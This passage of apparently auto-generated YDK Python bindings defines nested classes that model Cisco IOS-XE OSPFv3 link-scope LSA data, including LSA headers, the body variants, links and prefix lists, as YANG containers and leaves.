                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
                            class Ospfv3LsaVal(Entity):
                                """Decoded OSPFv3 LSA: YANG container 'ospfv3-lsa-val' under 'link-scope-lsa'."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata and the 'header' and 'lsa-body' child containers."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
                                    self.yang_name = "ospfv3-lsa-val"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    # Maps YANG child segment name -> (python attribute, child class).
                                    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
                                    # No leaves directly on this container.
                                    self._leafs = OrderedDict()
                                    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
                                    self.header.parent = self
                                    self._children_name_map["header"] = "header"
                                    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
                                    self.lsa_body.parent = self
                                    self._children_name_map["lsa_body"] = "lsa-body"
                                    self._segment_path = lambda: "ospfv3-lsa-val"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk (no leaves of its own to track)."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
                                class Header(Entity):
                                    """OSPFv3 LSA header wrapper: YANG container 'header' under 'ospfv3-lsa-val'."""
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        """Initialize ydk metadata, header leaves, and the 'lsa-header' child."""
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
                                        self.yang_name = "header"
                                        self.yang_parent_name = "ospfv3-lsa-val"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
                                        self._leafs = OrderedDict([
                                            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                                            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
                                        ])
                                        self.lsa_id = None
                                        self.lsa_hdr_options = Bits()
                                        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
                                        self.lsa_header.parent = self
                                        self._children_name_map["lsa_header"] = "lsa-header"
                                        self._segment_path = lambda: "header"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        """Route writes through ydk so YLeaf/Bits leaf values are updated in place."""
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
                                    class LsaHeader(Entity):
                                        """Common LSA header fields: YANG container 'lsa-header' under 'header'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and the age/type/adv-router/seq/checksum/length leaves."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
                                            self.yang_name = "lsa-header"
                                            self.yang_parent_name = "header"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                                                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                                                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                                                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                                                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                                                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                                            ])
                                            self.age = None
                                            self.type = None
                                            self.adv_router = None
                                            self.seq_num = None
                                            self.checksum = None
                                            self.length = None
                                            self._segment_path = lambda: "lsa-header"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
                                class LsaBody(Entity):
                                    """Decoded OSPFv3 LSA body: YANG container 'lsa-body' under 'ospfv3-lsa-val'."""
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        """Initialize ydk metadata, flag leaves, and one child container per LSA body type."""
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
                                        self.yang_name = "lsa-body"
                                        self.yang_parent_name = "ospfv3-lsa-val"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        # One child container per OSPFv3 LSA body variant (network, prefix,
                                        # inter-area router, external, NSSA, link, inter-area prefix).
                                        self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
                                        self._leafs = OrderedDict([
                                            ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
                                            ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
                                        ])
                                        self.lsa_flag_options = Bits()
                                        self.lsa_body_flags = Bits()
                                        self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
                                        self.network.parent = self
                                        self._children_name_map["network"] = "network"
                                        self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
                                        self.prefix.parent = self
                                        self._children_name_map["prefix"] = "prefix"
                                        self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
                                        self.ia_router.parent = self
                                        self._children_name_map["ia_router"] = "ia-router"
                                        self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
                                        self.lsa_external.parent = self
                                        self._children_name_map["lsa_external"] = "lsa-external"
                                        self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
                                        self.nssa.parent = self
                                        self._children_name_map["nssa"] = "nssa"
                                        self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
                                        self.link_data.parent = self
                                        self._children_name_map["link_data"] = "link-data"
                                        self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
                                        self.ia_prefix.parent = self
                                        self._children_name_map["ia_prefix"] = "ia-prefix"
                                        self._segment_path = lambda: "lsa-body"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        """Route writes through ydk so Bits leaf values are updated in place."""
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
                                    class Network(Entity):
                                        """OSPFv3 network-LSA contents: YANG container 'network' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata, attached-router leaf-list, and options bits."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
                                            self.yang_name = "network"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                                                ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
                                            ])
                                            # leaf-list: one entry per router attached to the network.
                                            self.attached_router = []
                                            self.lsa_net_options = Bits()
                                            self._segment_path = lambda: "network"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeafList/Bits values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
                                    class Prefix(Entity):
                                        """Inter-area prefix data: YANG container 'prefix' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and the metric/prefix/options leaves."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
                                            self.yang_name = "prefix"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                                ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
                                                ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
                                            ])
                                            self.metric = None
                                            self.ia_prefix = None
                                            self.ia_prefix_options = None
                                            self._segment_path = lambda: "prefix"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
                                    class IaRouter(Entity):
                                        """Inter-area router data: YANG container 'ia-router' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and the metric/destination/options leaves."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
                                            self.yang_name = "ia-router"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                                ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
                                                ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
                                            ])
                                            self.metric = None
                                            self.destination_router_id = None
                                            self.lsa_ia_options = Bits()
                                            self._segment_path = lambda: "ia-router"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf/Bits values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
                                    class LsaExternal(Entity):
                                        """External-LSA data: YANG container 'lsa-external' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata, external-route leaves, and the 'flags' child."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
                                            self.yang_name = "lsa-external"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
                                            self._leafs = OrderedDict([
                                                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                                ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                                ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                            ])
                                            self.metric = None
                                            self.referenced_ls_type = None
                                            self.external_prefix = None
                                            self.external_prefix_options = None
                                            self.forwarding_address = None
                                            self.external_route_tag = None
                                            self.referenced_link_state_id = None
                                            self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
                                            self.flags.parent = self
                                            self._children_name_map["flags"] = "flags"
                                            self._segment_path = lambda: "lsa-external"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                        class Flags(Entity):
                                            """External-LSA flag bits: YANG container 'flags' under 'lsa-external'."""
                                            _prefix = 'ospf-ios-xe-oper'
                                            _revision = '2018-02-01'
                                            def __init__(self):
                                                """Initialize ydk metadata and the single boolean e-flag leaf."""
                                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
                                                self.yang_name = "flags"
                                                self.yang_parent_name = "lsa-external"
                                                self.is_top_level_class = False
                                                self.has_list_ancestor = True
                                                self.ylist_key_names = []
                                                self._child_classes = OrderedDict([])
                                                self._leafs = OrderedDict([
                                                    ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                                ])
                                                self.e_flag = None
                                                self._segment_path = lambda: "flags"
                                                self._is_frozen = True
                                            def __setattr__(self, name, value):
                                                """Route writes through ydk so the YLeaf value is updated in place."""
                                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
                                    class Nssa(Entity):
                                        """NSSA-LSA wrapper: YANG container 'nssa' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and the 'lsa-nssa-external' child container."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
                                            self.yang_name = "nssa"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
                                            # No leaves directly on this container.
                                            self._leafs = OrderedDict()
                                            self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
                                            self.lsa_nssa_external.parent = self
                                            self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
                                            self._segment_path = lambda: "nssa"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk (no leaves of its own to track)."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
                                        class LsaNssaExternal(Entity):
                                            """NSSA external data: YANG container 'lsa-nssa-external' under 'nssa'."""
                                            _prefix = 'ospf-ios-xe-oper'
                                            _revision = '2018-02-01'
                                            def __init__(self):
                                                """Initialize ydk metadata, external-route leaves, and the 'flags' child."""
                                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
                                                self.yang_name = "lsa-nssa-external"
                                                self.yang_parent_name = "nssa"
                                                self.is_top_level_class = False
                                                self.has_list_ancestor = True
                                                self.ylist_key_names = []
                                                self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
                                                self._leafs = OrderedDict([
                                                    ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                                                    ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                                    ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                                                    ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                                                    ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                                                    ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                                                    ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                                ])
                                                self.metric = None
                                                self.referenced_ls_type = None
                                                self.external_prefix = None
                                                self.external_prefix_options = None
                                                self.forwarding_address = None
                                                self.external_route_tag = None
                                                self.referenced_link_state_id = None
                                                self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
                                                self.flags.parent = self
                                                self._children_name_map["flags"] = "flags"
                                                self._segment_path = lambda: "lsa-nssa-external"
                                                self._is_frozen = True
                                            def __setattr__(self, name, value):
                                                """Route writes through ydk so YLeaf values are updated in place."""
                                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                            class Flags(Entity):
                                                """NSSA external flag bits: YANG container 'flags' under 'lsa-nssa-external'."""
                                                _prefix = 'ospf-ios-xe-oper'
                                                _revision = '2018-02-01'
                                                def __init__(self):
                                                    """Initialize ydk metadata and the single boolean e-flag leaf."""
                                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
                                                    self.yang_name = "flags"
                                                    self.yang_parent_name = "lsa-nssa-external"
                                                    self.is_top_level_class = False
                                                    self.has_list_ancestor = True
                                                    self.ylist_key_names = []
                                                    self._child_classes = OrderedDict([])
                                                    self._leafs = OrderedDict([
                                                        ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                                    ])
                                                    self.e_flag = None
                                                    self._segment_path = lambda: "flags"
                                                    self._is_frozen = True
                                                def __setattr__(self, name, value):
                                                    """Route writes through ydk so the YLeaf value is updated in place."""
                                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
                                    class LinkData(Entity):
                                        """Link-LSA data: YANG container 'link-data' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and the priority/address/prefix-count/options leaves."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
                                            self.yang_name = "link-data"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                                                ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                                                ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                                                ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                                            ])
                                            self.rtr_priority = None
                                            self.link_local_interface_address = None
                                            self.num_of_prefixes = None
                                            self.lsa_id_options = Bits()
                                            self._segment_path = lambda: "link-data"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf/Bits values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
                                    class IaPrefix(Entity):
                                        """Intra-area prefix data: YANG container 'ia-prefix' under 'lsa-body'."""
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        def __init__(self):
                                            """Initialize ydk metadata and referenced-LSA/prefix-count leaves."""
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
                                            self.yang_name = "ia-prefix"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                                ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                                                ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                                            ])
                                            self.referenced_ls_type = None
                                            self.referenced_link_state_id = None
                                            self.referenced_adv_router = None
                                            self.num_of_prefixes = None
                                            self._segment_path = lambda: "ia-prefix"
                                            self._is_frozen = True
                                        def __setattr__(self, name, value):
                                            """Route writes through ydk so YLeaf values are updated in place."""
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
                            class Ospfv3Link(Entity):
                                """OSPFv3 router-LSA link: YANG list keyed by interface-id, neighbor-interface-id, neighbor-router-id."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the three-part list key, and type/metric leaves."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
                                    self.yang_name = "ospfv3-link"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    # Composite YANG list key: all three leaves appear in the segment path below.
                                    self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                                        ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                                        ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                                        ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                        ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                    ])
                                    self.interface_id = None
                                    self.neighbor_interface_id = None
                                    self.neighbor_router_id = None
                                    self.type = None
                                    self.metric = None
                                    self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
                            class Ospfv3PrefixList(Entity):
                                """OSPFv3 prefix entry: YANG list 'ospfv3-prefix-list' keyed by prefix."""
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                def __init__(self):
                                    """Initialize ydk metadata, the prefix list key, and the options leaf."""
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
                                    self.yang_name = "ospfv3-prefix-list"
                                    self.yang_parent_name = "link-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['prefix']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                        ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                    ])
                                    self.prefix = None
                                    self.prefix_options = None
                                    self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
                                    self._is_frozen = True
                                def __setattr__(self, name, value):
                                    """Route writes through ydk so YLeaf values are updated in place."""
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
                            class Ospfv3IaPrefix(Entity):
